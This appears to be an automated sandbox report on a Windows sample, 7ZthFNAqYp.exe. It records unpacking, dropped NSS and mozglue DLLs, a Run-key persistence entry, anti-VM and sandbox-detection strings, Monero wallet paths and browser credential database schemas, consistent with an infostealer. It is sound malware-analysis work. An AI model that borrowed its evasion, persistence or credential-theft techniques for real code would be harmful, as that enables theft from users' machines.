Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125180358.00000000011D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3102837907.00000000011AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 7ZthFNAqYp.exe	ReversingLabs: Detection: 44%
Source: 7ZthFNAqYp.exe	Virustotal: Detection: 44%

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File read: C:\Users\user\Desktop\7ZthFNAqYp.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: k7rn7l32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ntd3ll.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: 7ZthFNAqYp.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 7ZthFNAqYp.exe

Static file information: File size 5233152 > 1048576

Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_CURSOR
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_BITMAP
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_ICON
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_MENU
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_DIALOG
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_STRING
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_ACCELERATOR
Source: 7ZthFNAqYp.exe	Static PE information: section name: RT_GROUP_ICON

Source: 7ZthFNAqYp.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x25c800
Source: 7ZthFNAqYp.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x214200

Source: 7ZthFNAqYp.exe

Static PE information: More than 200 imports for USER32.dll

Source: 7ZthFNAqYp.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: freebl3.pdbp source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: nss3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: softokn3.pdb@ source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
Source:	Binary string: nss3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: mozglue.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402150620.0000000020238000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\dev\sw\hbautil\source\windows\bench32\Release\Bench32.exe.pdb source: 7ZthFNAqYp.exe, AttoConvertVideo.exe.0.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Unpacked PE file: 2.2.7ZthFNAqYp.exe.20020000.4.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00938ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00938ADE

PE file contains an invalid checksum

Source: 7ZthFNAqYp.exe

Static PE information: real checksum: 0x4238d5 should be: 0x506581

PE file contains sections with non-standard names

Source: freebl3.dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: softokn3.dll.2.dr	Static PE information: section name: .00cfg
Source: nss3.dll.2.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094F2D2 push ecx; ret	2_2_0094F2E5
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0094CE9A push ecx; retf	2_2_0094CE9B
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00942EC9 push esi; ret	2_2_00942ECB
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00952715 push 0000004Ch; iretd	2_2_00952726
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093DF45 push ecx; ret	2_2_0093DF58

Drops PE files

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AttoDesignerEditor			Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AttoDesignerEditor			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

2_2_00938ADE

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 7ZthFNAqYp.exe	Binary or memory string: DIR_WATCH.DLL
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: 7ZthFNAqYp.exe	Binary or memory string: SBIEDLL.DLL
Source: 7ZthFNAqYp.exe	Binary or memory string: API_LOG.DLL

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

2_2_0092180D

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Dropped PE file which has not been started: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

API coverage: 6.5 %

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00930DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00930EC3h

2_2_00930DB0

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00936013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00936013
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00929CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00929CF1
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_0093547D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0092D59B
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00921D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00921D80
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0092B5B4
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00934D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	2_2_00934D08
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0092BF22
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0092B914
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00935B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	2_2_00935B4D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	2_2_0092CD0C

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

